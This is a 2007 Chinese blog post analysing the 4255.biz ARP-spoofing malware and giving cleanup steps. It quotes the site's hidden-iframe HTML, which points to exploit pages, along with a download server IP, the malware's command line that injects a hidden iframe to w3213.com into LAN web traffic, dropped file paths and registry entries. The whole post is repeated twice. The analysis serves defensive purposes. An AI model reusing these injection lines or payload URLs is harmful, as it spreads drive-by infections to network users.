关于利用arp欺骗的病毒4255.biz的分析及解决
作者:NetFox 日期:2007-07-11
最近很多人中了这个4255.biz的恶意网站
今天在虚拟机里测试了一下
由于本人水平有限 加之测试时间仓促 可能有部分现象没有看到 只能就我看见的内容说一下 并简单的提出查杀建议
如果有疏漏 请广大网友指正
进入4255.biz这个网站之后
可以看到如下代码
<html><TITLE>index</TITLE><BODY><iframe width=50
height=0></iframe> <iframe src=http://4255.biz/aaa/bbb/ccc/bbb/002.htm width=0 height=0></iframe>
<iframe src=http://4255.biz/aaa/bbb/ccc/ccc/003.htm width=0 height=0></iframe> <script
src='http://s19.cnzz.com/stat.php?id=471769&web_id=471769' language='JavaScript'
charset='gb2312'></script></body></html>
http://4255.biz/aaa/bbb/ccc/aaa/001.htm里面有一个利用鼠标漏洞的网马
http://4255.biz/aaa/bbb/ccc/aaa/1.jpg指向http://4255.biz/aaa/bbb/ccc/ddd.exe
002.htm里面是一个加密的MS06-014网马,同样挂了http://4255.biz/aaa/bbb/ccc/ddd.exe
ddd.exe 运行后 释放C:\WINDOWS\system\logo_1.exe
连接218.75.151.159:80 下载1.exe 2.exe 3.exe 8.exe 12.exe 13.exe等木马
3.exe释放C:\WINDOWS\winform.exe和C:\WINDOWS\system32\winform.dll
8.exe释放C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe
12.exe释放C:\WINDOWS\Syswm5\svchost.exe
13.exe 释放C:\WINDOWS\msccrt.exe和C:\WINDOWS\system32\msccrt.dll
过程中还在机器里安装了一个驱动,但是不知道是谁释放的
一个是HKLM\SYSTEM\CurrentControlSet\Services\NPF 指向system32\drivers\npf.sys
还安装了一个嗅叹器
sreng日志里可见
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
<"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
最重要的就是那个1.exe
他是所有问题之关键
1.exe运行后 启动C:\WINDOWS\system\WPC.DLL(作为一个进程启动?什么意思呢?)
之后由C:\WINDOWS\system\WPC.DLL调用cmd启动 C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\NetMonInstaller.exe
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下添加启动项目
<InternetEx><C:\WINDOWS\system\1.exe> []
最后这一点是比较重要的
SSM监控的日志如下
父级进程:
路径: C:\WINDOWS\system\1.exe
PID: 1844
子级进程:
路径: C:\WINDOWS\system\CMD.DLL
命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -reset
父级进程:
路径: C:\WINDOWS\system\1.exe
PID: 1844
子级进程:
路径: C:\WINDOWS\system\CMD.DLL
命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -port 80 -insert "<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>"
http://w3213.com/ 打开后同样是利用ani漏洞下载那个ddd.exe
应该在这里进行了arp欺骗,局域网中的用户可能会感受到这一点,中毒的机器会不断向局域网内发送数据包,当你访问服务器时,被他截获,然后在其后面插入<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>这段代码 再发送给你
然后其他机器打开IE之后就会被插入上面那段代码 下载那个病毒继续攻击其他机器。
最终导致整个局域网瘫痪。
关于arp欺骗:
ARP攻击:导致瞬间掉线和大面积断网的罪魁祸首。在局域网中,通过ARP协议来进行IP地址(第三层)与第二层物理地址(即MAC地址)的相互转换。网吧中的一些设备如路由器、装有TCP/IP协议的电脑等都提供ARP缓存表,以提高通信速度。目前很多带有ARP欺骗功能的攻击软件都是利用ARP协议的这个特点来对网络设备进行攻击,通过伪造的MAC与局域网内的IP地址对应,并修改路由器或电脑的ARP缓存表,使得具有合法MAC的电脑无法与IP对应,从而无法通过路由器上网。在掉线重启路由器后,ARP缓存表会刷新,网络会在短时间内恢复正常,待ARP攻击启动后,又出现断网现象,如此反复,很容易被误断为路由器“死机”,从而使得网吧网管员无法及时采取行动迅速恢复网吧的正常营运。
转自 http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
全过程中增加的文件如下
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe
sreng日志反馈如下
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe> []
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<wm><C:\WINDOWS\Syswm5\svchost.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<winform><C:\WINDOWS\winform.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<InternetEx><C:\WINDOWS\system\1.exe> []
服务
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
<"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
驱动程序
[NetGroup Packet Filter Driver / NPF][Running/Manual Start]
<system32\drivers\npf.sys><NetGroup - Politecnico di Torino>
另外据其他人讲,说那个logo_1.exe还会感染exe
由于我虚拟机里只有一个分区 所以没测试到感染的情况 可能感染其他分区的吧
以上是我观察到的情况 可能有疏漏 而且有些参数也不懂 请广大网友指正
下面就我观察到的情况给出解决方案
建议断网查杀(尤其局域网用户)
对于局域网内中毒的机器:
(查找中毒机器的方法:看交换机上哪个电脑的流量最大,灯狂闪,找到了,打他拨了,再上网试,这时候如果发现所有电脑都上不了网了,或是连路由器也PING不通了,那么就找到这个主机了)摘自http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
处理办法如下
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
<w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe> []
<wm><C:\WINDOWS\Syswm5\svchost.exe> []
<winform><C:\WINDOWS\winform.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<InternetEx><C:\WINDOWS\system\1.exe> []
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Packet Capture Protocol v.0 (experimental) / rpcapd
在“启动项目”-“服务”-“驱动程序”中 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否
NetGroup Packet Filter Driver / NPF
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe
C:\WINDOWS\Syswm5\文件夹
清空临时文件夹
使用反病毒软件 修复被感染的exe
对于局域网内被攻击的用户 即出现打开IE就自动连接到http://w3213.com/或4255.biz下载恶意代码的用户
建议安装Antiarp这个软件
而且务必要打上所有必要的系统补丁 这样即使局域网中有中毒机器 你的机器也不会因为那个利用ani漏洞的jpg 而被成功攻破 成为另一台攻击他人的机器
以上是我对于4255.biz的一点认识 如果有问题 请指正
今天在虚拟机里测试了一下
由于本人水平有限 加之测试时间仓促 可能有部分现象没有看到 只能就我看见的内容说一下 并简单的提出查杀建议
如果有疏漏 请广大网友指正
进入4255.biz这个网站之后
可以看到如下代码
<html><TITLE>index</TITLE><BODY><iframe width=50
height=0></iframe> <iframe src=http://4255.biz/aaa/bbb/ccc/bbb/002.htm width=0 height=0></iframe>
<iframe src=http://4255.biz/aaa/bbb/ccc/ccc/003.htm width=0 height=0></iframe> <script
src='http://s19.cnzz.com/stat.php?id=471769&web_id=471769' language='JavaScript'
charset='gb2312'></script></body></html>
http://4255.biz/aaa/bbb/ccc/aaa/001.htm里面有一个利用鼠标漏洞的网马
http://4255.biz/aaa/bbb/ccc/aaa/1.jpg指向http://4255.biz/aaa/bbb/ccc/ddd.exe
002.htm里面是一个加密的MS06-014网马,同样挂了http://4255.biz/aaa/bbb/ccc/ddd.exe
ddd.exe 运行后 释放C:\WINDOWS\system\logo_1.exe
连接218.75.151.159:80 下载1.exe 2.exe 3.exe 8.exe 12.exe 13.exe等木马
3.exe释放C:\WINDOWS\winform.exe和C:\WINDOWS\system32\winform.dll
8.exe释放C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe
12.exe释放C:\WINDOWS\Syswm5\svchost.exe
13.exe 释放C:\WINDOWS\msccrt.exe和C:\WINDOWS\system32\msccrt.dll
过程中还在机器里安装了一个驱动,但是不知道是谁释放的
一个是HKLM\SYSTEM\CurrentControlSet\Services\NPF 指向system32\drivers\npf.sys
还安装了一个嗅叹器
sreng日志里可见
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
<"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
最重要的就是那个1.exe
他是所有问题之关键
1.exe运行后 启动C:\WINDOWS\system\WPC.DLL(作为一个进程启动?什么意思呢?)
之后由C:\WINDOWS\system\WPC.DLL调用cmd启动 C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\NetMonInstaller.exe
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下添加启动项目
<InternetEx><C:\WINDOWS\system\1.exe> []
最后这一点是比较重要的
SSM监控的日志如下
父级进程:
路径: C:\WINDOWS\system\1.exe
PID: 1844
子级进程:
路径: C:\WINDOWS\system\CMD.DLL
命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -reset
父级进程:
路径: C:\WINDOWS\system\1.exe
PID: 1844
子级进程:
路径: C:\WINDOWS\system\CMD.DLL
命令行:C:\WINDOWS\system\CMD.DLL -idx 0 -ip 169.254.0.2-169.254.255.253 -port 80 -insert "<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>"
http://w3213.com/ 打开后同样是利用ani漏洞下载那个ddd.exe
应该在这里进行了arp欺骗,局域网中的用户可能会感受到这一点,中毒的机器会不断向局域网内发送数据包,当你访问服务器时,被他截获,然后在其后面插入<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>这段代码 再发送给你
然后其他机器打开IE之后就会被插入上面那段代码 下载那个病毒继续攻击其他机器。
最终导致整个局域网瘫痪。
关于arp欺骗:
ARP攻击:导致瞬间掉线和大面积断网的罪魁祸首。在局域网中,通过ARP协议来进行IP地址(第三层)与第二层物理地址(即MAC地址)的相互转换。网吧中的一些设备如路由器、装有TCP/IP协议的电脑等都提供ARP缓存表,以提高通信速度。目前很多带有ARP欺骗功能的攻击软件都是利用ARP协议的这个特点来对网络设备进行攻击,通过伪造的MAC与局域网内的IP地址对应,并修改路由器或电脑的ARP缓存表,使得具有合法MAC的电脑无法与IP对应,从而无法通过路由器上网。在掉线重启路由器后,ARP缓存表会刷新,网络会在短时间内恢复正常,待ARP攻击启动后,又出现断网现象,如此反复,很容易被误断为路由器“死机”,从而使得网吧网管员无法及时采取行动迅速恢复网吧的正常营运。
转自 http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
全过程中增加的文件如下
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe
sreng日志反馈如下
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe> []
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<wm><C:\WINDOWS\Syswm5\svchost.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<winform><C:\WINDOWS\winform.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<InternetEx><C:\WINDOWS\system\1.exe> []
服务
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
<"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
驱动程序
[NetGroup Packet Filter Driver / NPF][Running/Manual Start]
<system32\drivers\npf.sys><NetGroup - Politecnico di Torino>
另外据其他人讲,说那个logo_1.exe还会感染exe
由于我虚拟机里只有一个分区 所以没测试到感染的情况 可能感染其他分区的吧
以上是我观察到的情况 可能有疏漏 而且有些参数也不懂 请广大网友指正
下面就我观察到的情况给出解决方案
建议断网查杀(尤其局域网用户)
对于局域网内中毒的机器:
(查找中毒机器的方法:看交换机上哪个电脑的流量最大,灯狂闪,找到了,打他拨了,再上网试,这时候如果发现所有电脑都上不了网了,或是连路由器也PING不通了,那么就找到这个主机了)摘自http://bbs.360safe.com/viewthread.php?tid=166703&extra=page%3D1
处理办法如下
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
<w0g6dyck><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1explore.exe> []
<wm><C:\WINDOWS\Syswm5\svchost.exe> []
<winform><C:\WINDOWS\winform.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<InternetEx><C:\WINDOWS\system\1.exe> []
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Packet Capture Protocol v.0 (experimental) / rpcapd
在“启动项目”-“服务”-“驱动程序”中 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否
NetGroup Packet Filter Driver / NPF
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system\WPC.DLL
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\winform.exe
C:\WINDOWS\Syswm5\文件夹
清空临时文件夹
使用反病毒软件 修复被感染的exe
对于局域网内被攻击的用户 即出现打开IE就自动连接到http://w3213.com/或4255.biz下载恶意代码的用户
建议安装Antiarp这个软件
而且务必要打上所有必要的系统补丁 这样即使局域网中有中毒机器 你的机器也不会因为那个利用ani漏洞的jpg 而被成功攻破 成为另一台攻击他人的机器
以上是我对于4255.biz的一点认识 如果有问题 请指正
上一篇: 
下一篇: 
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: -3 | 查看次数: -
发表评论